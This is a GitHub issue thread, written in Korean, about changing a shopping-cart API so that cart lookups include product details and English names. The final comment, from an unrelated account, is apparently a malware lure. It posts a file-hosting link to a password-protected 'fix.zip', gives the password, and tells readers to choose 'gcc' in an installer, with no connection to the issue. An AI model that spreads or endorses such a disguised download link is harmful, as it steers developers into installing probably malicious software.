### ISSUE TITLE
#51 상품 장바구니 API 수정

### ISSUE THREAD

**Issue by sw0501** [team-conSOLtant/Backend#51]
## 📌 설명
상품 장바구니 API 수정

## ✅ 상세 내용
- [x] 상품 장바구니 조회 시 상품 상세정보 추가
- [x] 상품 장바구니 조회 시 영어 이름 추가

## ⏱ 예상 소요 시간
1days

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
